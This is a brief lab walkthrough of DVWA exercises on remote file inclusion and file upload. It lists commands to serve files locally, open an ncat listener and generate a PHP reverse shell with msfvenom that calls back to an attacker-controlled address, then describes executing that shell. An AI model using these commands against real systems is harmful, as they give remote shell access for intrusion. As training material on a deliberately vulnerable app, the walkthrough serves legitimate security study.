DVWA Exercises 4
07 Remote Fileinclusion
Start a local webserver listening on port 8001
python3 -m http.server 8001

Start a ncat listener on port 8002
ncat -lvnp 8002

Generate a php reverseshell with msfvenom
msfvenom -p php/reverse_php LHOST="172.17.0.1" LPORT=8002 -f raw >shell.php

First let's do a check if a remote target can be placed in the URL:

That seems to work! I can also see the http get request for test.php on my local webserver:

And now let's execute the remoteshell:


08 File upload

Php Reverseshell successfully uploaded

Let's try to execute the reverseshell

Last updated
Was this helpful?